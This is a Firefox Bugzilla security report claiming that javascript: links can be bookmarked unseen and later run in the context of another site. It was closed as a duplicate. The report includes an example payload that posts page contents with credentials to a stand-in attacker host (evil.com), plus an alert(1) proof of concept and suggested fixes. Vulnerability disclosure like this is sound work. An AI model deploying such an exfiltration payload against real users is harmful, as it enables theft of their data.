Closed Bug 1721092 Opened 3 years ago Closed 3 years ago

Potential universal XSS in Firefox through a bookmarked link

Categories

(Firefox :: Security, task)

task

Tracking

()

RESOLVED DUPLICATE of bug 371923

People

(Reporter: hj923, Unassigned)

References

Details

(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(1 file)

Attached file bookmark.html

Hi,

My name is Joel, and I am not still sure this might be a vulnerability. But if it really is, it should be fixed - otherwise it's also fine because I'm in a learning process - so let me begin. It's actually very simple.

Environment

This vulnerability was possible to be reproduced with this setup:

  • Firefox version: 90.0 (64-bit MacOS, Intel CPU)
  • MacOS version: 10.15.7

Steps to reproduce

Mozilla Firefox supports:

  1. Right-clicking on any link (for example, an <a> tag)
  2. And then sequentially, bookmarking that link.

Now, you might already see where this is heading to. Here are steps to reproduce this XSS.

  1. A malicious website presents the user with the following HTML:
<a href="javascript:fetch("https://evil.com", { credentials: 'include', method: 'POST', mode: 'no-cors', body: JSON.stringify(encodeURIComponent(document.innerHTML)) })">
Bookmark me for later
</a>
  1. User does not immediately click on the link to open whatever that is inside href, but saves it for later by right-clicking on the link to show the native contextmenu and clicking on 'Bookmark Link'.
  2. User is prompted to review 'Name,' 'Location' (folder), and 'Tags' of the bookmark that he/she is going to save, but interestingly enough, there is no actual link (that is, the href attribute) to be confirmed.
  3. Users clicks on 'Save'.
  4. User navigates to any other websites to browse
  5. User wants to see the bookmark he/she saved for later. User clicks on the bookmark.
  6. The fetch request will fire as expected; the code above is kind of the combination I found to extract as much information as possible from a victim; but it could be any valid javascript code to exploit the victim, really (for example, to exploit existing CSRF vulnerabilities on the current webpage user's on).

Cause

  • Firefox is not preventing any href attribute containing javascript code from being added to the bookmark. The entire cost of examining the validity and safety of the href attribute is entrusted to the user. This is a behavior unlike Chrome, Edge, Opera, or Safari where javascript code in href can't be directly bookmarked, which strongly suggests that this is potential security problem.

Impact/Scenarios

  • 'Bookmark Link' is a quite accessible feature, because it can be accessed from just a single right click, meaning that there is may be a higher chance a user will be tricked into it.
  • Although an attacker cannot control when the user will click on the bookmark, there is still a very high chance that an attacker will be able to retrieve large sum of data if user is indeed on a poorly configured website from security point of view - for example, a website where cookie is not specified as httpOnly, or sameSite as none (where CSP and CORS are just loose enough).
  • The most basic thing that an attacker is able to achieve when CSP and CORS rules are loose enough, is to view whatever text that is on the victim's webpage: be it password, username, link to a profile picture, list of my friends, contacts, email addresses ... and so on.
  • An attacker may also attempt to deliver a mixture of this vulnerability and others. For example, exploiting using this vulnerability to exploit existing CSRF vulnerabilities on a popular website.

Mitigation

  1. Firefox can disable 'Bookmark Link' function when it's not a valid link via Regex.
  2. To further prevent the user from adding a malicious javascript code in his/her bookmarks, Firefox may also allow the user to review the href attribute when the prompt is shown before it is saved. Currently, there is no way to know what the actual link (href attribute) was until the very moment user clicks on the bookmark to supposedly navigate to that link.
    Attached is a single HTML file containing these lines of code. Please try it.
<html>
  <body>
    <a href="javascript:alert(1)">Add this to bookmark</a>  
  </body>
</html>
Flags: sec-bounty?
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-
See Also: → 1725487
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: